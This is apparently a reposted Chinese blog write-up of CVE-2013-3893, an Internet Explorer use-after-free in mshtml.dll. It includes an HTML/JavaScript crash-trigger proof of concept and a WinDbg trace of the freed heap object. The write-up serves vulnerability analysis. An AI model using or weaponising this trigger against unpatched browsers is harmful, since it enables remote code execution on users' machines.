首页 > 其他 > 详细

CVE-2013-3893

时间:2016-08-22 23:15:56      阅读:191      评论:0      收藏:0      [点我收藏+]

Microsoft Internet Explorer 远程代码执行漏洞(CNNVD-201309-304)

        Internet Explorer(IE)是美国微软(Microsoft)公司开发的一款Web浏览器,是Windows操作系统附带的默认浏览器。 
        Microsoft IE 6至11版本中的mshtml.dll文件中的SetMouseCapture功能实现中存在远程代码执行漏洞,该漏洞源于程序访问内存中已被删除或尚未正确分配的对象。攻击者可借助特制的网站并诱使用户查看该网站,利用该漏洞在IE中的当前用户的上下文中执行任意代码,可造成内存损坏。成功利用此漏洞的攻击者可获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

POC如下

<html>

<script>

function trigger()

{

Math.tan(3,4);

var id_0 = document.createElement("sup");

var id_1 = document.createElement("audio");

Math.sin(0);

document.body.appendChild(id_0);

document.body.appendChild(id_1);

Math.cos(0);

id_1.applyElement(id_0);

Math.tan(3,4);

id_0.onlosecapture=function(e) {

document.write("");

}

Math.sin(0);

id_0[outerText]="";

Math.cos(0);

id_0.setCapture();

Math.tan(3,4);

id_1.setCapture();

Math.sin(0);

}
window.onload = function() {

trigger();

}

</script>

</html>

 程序crash到如下所示的情况,其中edi的值触发了异常。经过分析后发现,edi的值来自于上层函数的传递。并且这个edi的值处于一个已经释放的堆中,调试记录如下所示。

1:021> g
(ed4.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi=00000000 edi=074a9fb0
eip=656c1f60 esp=041ce618 ebp=041ce620 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CDoc::HasContainerCapture+0x14:
656c1f60 8b0f            mov     ecx,dword ptr [edi]  ds:0023:074a9fb0=????????
1:021> !heap -p -a edi
    address 074a9fb0 found in
    _DPH_HEAP_ROOT @ 1201000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7392478:          74a9000             2000
    6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    771e5674 ntdll!RtlDebugFreeHeap+0x0000002f
    771a7aca ntdll!RtlpFreeHeap+0x0000005d
    77172d68 ntdll!RtlFreeHeap+0x00000142
    75a5f1ac kernel32!HeapFree+0x00000014
    656be590 mshtml!CTreeNode::Release+0x0000002d
    656d15b1 mshtml!CMarkup::UnloadContents+0x00000380
    656d2a8a mshtml!CMarkup::TearDownMarkupHelper+0x00000055
    656d2a15 mshtml!CMarkup::TearDownMarkup+0x00000049
    655b3b5e mshtml!COmWindowProxy::SwitchMarkup+0x000005a0
    65502bb4 mshtml!CDocument::open+0x00000426
    65500789 mshtml!CDocument::write+0x0000007c
    655b3267 mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085
    656e235c mshtml!CBase::ContextInvokeEx+0x000005dc
    656e25d5 mshtml!CBase::InvokeEx+0x00000025
    656edf9a mshtml!DispatchInvokeCollection+0x0000014c
    656a4998 mshtml!CDocument::InvokeEx+0x000000f0
    65693148 mshtml!CBase::VersionedInvokeEx+0x00000020
    65693104 mshtml!PlainInvokeEx+0x000000eb
    6b4ea22a jscript!IDispatchExInvokeEx2+0x00000104
    6b4ea175 jscript!IDispatchExInvokeEx+0x0000006a
    6b4ea3f6 jscript!InvokeDispatchEx+0x00000098
    6b4ea4a0 jscript!VAR::InvokeByName+0x00000139
    6b4fd8c8 jscript!VAR::InvokeDispName+0x0000007d
    6b4fd96f jscript!VAR::InvokeByDispID+0x000000ce
    6b4fe3e7 jscript!CScriptRuntime::Run+0x00002b80
    6b4f5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6b4f5bfb jscript!ScrFncObj::Call+0x0000008d
    6b4f5e11 jscript!CSession::Execute+0x0000015f
    6b4ef3ee jscript!NameTbl::InvokeDef+0x000001b5
    6b4eea2e jscript!NameTbl::InvokeEx+0x0000012c
    65707af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1

 

CVE-2013-3893

原文:http://www.cnblogs.com/Ox9A82/p/5797123.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!